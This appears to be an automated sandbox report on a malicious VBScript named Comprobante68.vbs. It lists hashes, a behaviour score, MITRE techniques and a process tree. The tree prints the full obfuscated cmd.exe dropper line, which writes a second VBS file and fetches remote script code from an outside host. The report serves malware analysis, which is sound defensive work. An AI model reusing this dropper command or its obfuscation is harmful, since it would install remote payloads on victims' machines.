48c42d8c9b585fb48b952807941853d6520285aaa4ec138d422bb51104f3b9fd

General

Target

Comprobante68.vbs
Size

52KB
MD5

c71257572d8131728c62b52248017025
SHA1

e4c7ac7b3f4047d7ace1559df4c9894f3224e2f8
SHA256

d2099233a72c282e64e85abcddb284cdffc18b24e088947254f9b55670f52f83
SHA512

02bc2015753fd65b202be58fde85fe0e7b8028bdf7b76ed052170725a5fac4a691aac69f29bcdf44e0f4d6ac01e7780905e7b8140e36543f8f6c7949c999add8

Score

8^/10

Blocklisted process makes network request 5 IoCs

Processes:

WScript.exe

flow pid process

9 208 WScript.exe
11 208 WScript.exe
13 208 WScript.exe
15 208 WScript.exe
17 208 WScript.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings cmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2256 wrote to memory of 2016	2256	WScript.exe	cmd.exe
PID 2256 wrote to memory of 2016	2256	WScript.exe	cmd.exe
PID 2016 wrote to memory of 2348	2016	cmd.exe	cmd.exe
PID 2016 wrote to memory of 2348	2016	cmd.exe	cmd.exe
PID 2016 wrote to memory of 2612	2016	cmd.exe	cmd.exe
PID 2016 wrote to memory of 2612	2016	cmd.exe	cmd.exe
PID 2612 wrote to memory of 2728	2612	cmd.exe	cmd.exe
PID 2612 wrote to memory of 2728	2612	cmd.exe	cmd.exe
PID 2728 wrote to memory of 208	2728	cmd.exe	WScript.exe
PID 2728 wrote to memory of 208	2728	cmd.exe	WScript.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Comprobante68.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2256
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /V/D/c "SEt PU3=.vb&&SEt ga82= s6562 =ni0h58 ^"scni0h58rini0h58ptni0h58:^": lb078 =ni0h58 ^"hni0h58TtPsni0h58:^": Gni0h58etni0h58Objni0h58ecni0h58t(ni0h58s6562+lb078+^"&&sET ni0h58=fk56713fk56713contatornew3.3utilities.com/p1.php^")&&sEt/^p fba78="%ga82:ni0h58=%%ni0h58:fk56713=/%"<nul > C:\Users\Public\^hrw42d41%PU3%s|start cmd /c start C:\Users\Public\^hrw42d41%PU3%s"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" sEt/p fba78="%ga82:ni0h58=%%ni0h58:fk56713=/%" 0<nul 1>C:\Users\Public\hrw42d41%PU3%s"
    3⤵
    PID:2348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" start cmd /c start C:\Users\Public\hrw42d41%PU3%s "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\system32\cmd.exe
      cmd /c start C:\Users\Public\hrw42d41.vbs
      4⤵
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:2728
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Public\hrw42d41.vbs"
        5⤵
        Blocklisted process makes network request
        
        PID:208

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

C:\Users\Public\hrw42d41.vbs

MD5
27a17097b2c92780df571e05d93d44b2

SHA1
bc1791586a61e54a5a41f1403e827d9ed91d2d8d

SHA256
87340165ea0fb1e06364aa479acb2ff104ceddeaace0e548f687b2960a28ed36

SHA512
58b60de98416aebec71e75e05fcf93e56ff77b7322ca6272e06eb9a84e18c344055b678e5430991d9f9467d883102c4323fbf1ea3ec46e117bbba3035c802d7c

Download Submit
memory/208-119-0x0000000000000000-mapping.dmp

Download
memory/2016-114-0x0000000000000000-mapping.dmp

Download
memory/2348-115-0x0000000000000000-mapping.dmp

Download
memory/2612-116-0x0000000000000000-mapping.dmp

Download
memory/2728-117-0x0000000000000000-mapping.dmp

Download